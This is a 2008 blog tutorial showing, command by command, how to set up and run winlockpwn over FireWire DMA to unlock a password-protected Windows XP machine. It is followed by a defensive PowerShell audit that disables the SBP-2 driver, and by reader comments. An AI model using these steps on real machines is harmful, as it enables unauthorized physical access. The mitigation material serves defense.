illmob.org

Winlockpwn – Access through firewire

June 22nd, 2008 by Dev Team in Password Info, windows

From Pauldotcom:

winlockpwn is a memory analysis tool released by Adam Boileau of storm.net.nz. This utility exploits FireWire’s direct memory access. The operating system allows FireWire devices to read and write physical memory directly without going through the processor. Sounds handy, right?

I installed winlockpwn on Ubuntu 7.10 and a fully patched Windows XP SP2 box. The first step is to download the required libraries:

sudo aptitude install libdc1394-13 libraw1394-dev swig python

Now we need to download and build Python 2.3, because I tried to run it using Python 2.5 with no success:

wget http://www.python.org/ftp/python/2.3.6/Python-2.3.6.tgz
tar -zxvf Python-2.3.6.tgz
cd Python-2.3.6
./configure
make
sudo make install

The next step is to modify libraw1394:

sudo vim /usr/include/libraw1394/raw1394.h

At this point go ahead and search for “__attribute__((deprecated));” in the file raw1394.h and comment out every line that contains it. Hint: don’t forget to end the line above it with a semi-colon. Once you comment all of them out, save and close the file. The next step is to get the pythonraw1394 library. It contains the python bindings for libraw1394, romtool, and businfo from Adam’s site.

wget http://www.storm.net.nz/static/files/pythonraw1394-1.0.tar.gz

And of course, we need to untar it:

tar -zxvf pythonraw1394-1.0.tar.gz

Now we need to go into the untarred directory and download the actual winlockpwn script:

cd pythonraw1394
wget http://www.storm.net.nz/static/files/winlockpwn

The winlockpwn script needs to be in the pythonraw1394 directory or it won't work without modifying the code. Also, we need to make it executable:

chmod +x winlockpwn

Now we also need to edit the Makefile for pythonraw1394 to point it to python 2.3’s include directory:

sudo vim Makefile

Now change /usr/include/python2.3 to /usr/local/include/python2.3 on lines 5 and 6. Again, save and quit and compile it with the following command:

sudo make

The raw1394 kernel module also needs to be loaded and the permissions changed on the raw1394 device node:

sudo modprobe raw1394
sudo chmod 666 /dev/raw1394

Now we need to plug into the Windows machine and then edit romtool to reflect the location of python:

sudo vim romtool

Change #!/usr/bin/python to #!/usr/local/bin/python on the first line of the file. Repeat the same step for the winlockpwn script as well. Then load the iPod image onto the FireWire port:

./romtool -s 0 ipod.csr

Loading the iPod image onto the FireWire port basically fools Windows into thinking your Linux box is an iPod.

Now we can run businfo to make sure the iPod image is loaded and to see which port number it is on, as well as to make sure you can see the computer on the other end. Mine showed the iPod image loaded on port number 0 and my Windows box on node number 1.

Now, the fun part! Run winlockpwn as follows:

winlockpwn port node target

Mine looked like this:

./winlockpwn 0 1 1

Once you run winlockpwn, the Windows box will accept any password you choose to give it (even a blank password) and unlock the system for you.

There are many security issues that arise from winlockpwn. What is to stop one of the janitorial staff from getting into the CEO’s office after hours and immediately getting access to his box because all he did was lock it before he went home? It just goes to show that once someone gains physical access, game over.
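The countermeasure a defender would want at this point is to make sure a locked Windows box does not hand DMA to whatever claims to be an iPod on the FireWire port. The following PowerShell audit is an added example and is not part of the original post or of winlockpwn; it follows Microsoft's published guidance on blocking the SBP-2 driver (KB2516445). The registry path for the SBP-2 port driver and the PCI class code for 1394 OHCI controllers are taken from that guidance; the function names are my own. Run it in an elevated session.

```powershell
# Added example (not from the original post): audit a Windows host for the
# FireWire/SBP-2 attack surface that a DMA tool such as winlockpwn relies on,
# and optionally apply the Microsoft-documented mitigation.

function Test-Sbp2DriverDisabled {
    # SBP-2 is the protocol a FireWire device uses to present itself as storage
    # (the "iPod" image). Start = 4 means the driver is disabled, so the device
    # is never mapped for DMA. Registry path per Microsoft KB2516445.
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Services\sbp2port'
    if (-not (Test-Path $key)) {
        # No SBP-2 driver registered at all: nothing for the tool to talk to.
        return $true
    }
    $start = (Get-ItemProperty -Path $key -Name Start -ErrorAction SilentlyContinue).Start
    return ($start -eq 4)
}

function Get-FireWireControllers {
    # Any present 1394 OHCI controller (PCI class code 0C0010) is a DMA-capable
    # port an attacker can plug into. Win32_PnPEntity exists back to Windows XP.
    Get-WmiObject -Class Win32_PnPEntity |
        Where-Object {
            ($_.CompatibleID -contains 'PCI\CC_0C0010') -or
            ($_.HardwareID  -contains 'PCI\CC_0C0010')
        }
}

function Disable-Sbp2Driver {
    # Apply the mitigation: set the SBP-2 port driver to Disabled (Start = 4).
    # Supports -WhatIf so an operator can preview the change first.
    [CmdletBinding(SupportsShouldProcess = $true)]
    param()
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Services\sbp2port'
    if (-not (Test-Path $key)) { return }
    if ($PSCmdlet.ShouldProcess($key, 'Set Start=4 (disable SBP-2 driver)')) {
        Set-ItemProperty -Path $key -Name Start -Value 4 -Type DWord
    }
}

# Report: a host with a FireWire controller and an enabled SBP-2 driver is the
# configuration the post above unlocks with any password.
$controllers = @(Get-FireWireControllers)
$sbp2Off     = Test-Sbp2DriverDisabled
Write-Output ("1394 OHCI controllers present : {0}" -f $controllers.Count)
Write-Output ("SBP-2 driver disabled         : {0}" -f $sbp2Off)
if ($controllers.Count -gt 0 -and -not $sbp2Off) {
    Write-Warning 'Exposed: FireWire port present and SBP-2 enabled. Run Disable-Sbp2Driver (reboot required).'
}
```

Disabling SBP-2 stops the storage-device path used here, but it does not remove DMA from the 1394 controller itself; where the port is not needed, the stronger fix is to disable or physically remove the controller, and on later Windows versions to block its device class by policy.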

2 Responses to ' Winlockpwn – Access through firewire '


  1. Raven Poh said,

    on April 21st, 2010 at 1:45 am

    hi,
    Is it possible to use a USB to FireWire cable to link from a Linux VM to a WinXP SP2 machine? The Linux VM will be running the script and will be the attacked machine.

  2. 5H4D0W-H4X said,

    on January 7th, 2011 at 8:32 am

    No, it's not possible, because the reason this works is that FireWire uses DMA (Direct Memory Access) and USB doesn't have that capability.
